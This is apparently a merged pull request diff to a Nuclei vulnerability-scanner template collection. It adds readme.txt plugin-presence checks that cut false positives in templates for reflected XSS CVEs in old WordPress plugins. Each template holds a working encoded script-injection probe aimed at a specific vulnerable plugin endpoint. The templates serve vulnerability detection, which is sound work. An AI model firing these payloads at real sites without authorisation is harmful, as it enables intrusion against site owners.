Merge pull request #9391 from projectdiscovery/fix-wp-FP

Wordpress FP Fix

http/cves/2008/CVE-2008-1061.yaml

@@ -30,7 +30,20 @@ info:
     product: sniplets_plugin
   tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'Code Snippets'
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2011/CVE-2011-4624.yaml

@@ -30,7 +30,20 @@ info:
     google-query: inurl:"/wp-content/plugins/flash-album-gallery"
   tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'Grand Flagallery'
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2011/CVE-2011-4926.yaml

@@ -30,7 +30,20 @@ info:
     google-query: inurl:"/wp-content/plugins/adminimize/"
   tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'Adminimize ==='
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2011/CVE-2011-5107.yaml

@@ -29,7 +29,19 @@ info:
     google-query: inurl:"/wp-content/plugins/alert-before-your-post"
   tags: cve,cve2011,wordpress,xss,wp-plugin
 
+flow: http(1) && http(2)
+
 http:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - '/wp-content/plugins/alert-before-your-post/'
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2011/CVE-2011-5179.yaml

@@ -28,7 +28,20 @@ info:
     google-query: inurl:"/wp-content/plugins/skysa-official/"
   tags: cve,cve2011,wordpress,xss,wp-plugin,skysa
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'Skysa App'
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2011/CVE-2011-5181.yaml

@@ -28,7 +28,20 @@ info:
     google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/"
   tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'ClickDesk Live Support - Live Chat'
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2011/CVE-2011-5265.yaml

@@ -29,7 +29,20 @@ info:
     google-query: inurl:"/wp-content/plugins/featurific-for-wordpress"
   tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'Featurific For Wordpress'
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2012/CVE-2012-0901.yaml

@@ -29,7 +29,19 @@ info:
     google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin"
   tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione
 
+flow: http(1) && http(2)
+
 http:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - '/wp-content/plugins/yousaytoo-auto-publishing-plugin/'
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2012/CVE-2012-1835.yaml

@@ -28,7 +28,20 @@ info:
     google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar"
   tags: cve,cve2012,wordpress,xss,wp-plugin,timely
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'All-in-One Event Calendar'
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2012/CVE-2012-2371.yaml

@@ -29,7 +29,20 @@ info:
     product: wp-facethumb
   tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'WP-FaceThumb ==='
+
   - method: GET
     path:
       - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2012/CVE-2012-4242.yaml

@@ -26,7 +26,20 @@ info:
     product: mf_gig_calendar
   tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'MF Gig Calendar ='
+
   - method: GET
     path:
       - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2012/CVE-2012-4273.yaml

@@ -30,7 +30,22 @@ info:
     google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons"
   tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - '2 Click Social Media Buttons'
+          - 'Tags:'
+        condition: and
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2012/CVE-2012-4768.yaml

@@ -30,7 +30,20 @@ info:
     framework: wordpress
   tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'Download Monitor ='
+
   - method: GET
     path:
       - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2012/CVE-2012-5913.yaml

@@ -29,7 +29,20 @@ info:
     product: wordpress_integrator
   tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'Wordpress Integrator'
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'

http/cves/2013/CVE-2013-2287.yaml

@@ -29,7 +29,22 @@ info:
     google-query: inurl:"/wp-content/plugins/uploader"
   tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/uploader/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'Uploader'
+          - "Tags:"
+        condition: and
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2013/CVE-2013-3526.yaml

@@ -29,17 +29,32 @@ info:
     google-query: inurl:"/wp-content/plugins/trafficanalyzer"
   tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'traffic analy'
+          - 'Tags:'
+        condition: and
+
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "<script>alert(1)</script>"
+          - "<script>alert(document.domain)</script>"
 
       - type: word
         part: header

http/cves/2013/CVE-2013-4117.yaml

@@ -30,7 +30,20 @@ info:
     google-query: inurl:"/wp-content/plugins/category-grid-view-gallery"
   tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'Category Grid View Gallery ='
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

http/cves/2013/CVE-2013-4625.yaml

@@ -29,7 +29,20 @@ info:
     google-query: inurl:"/wp-content/plugins/duplicator"
   tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'Duplicator - WordPress Migration'
+
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'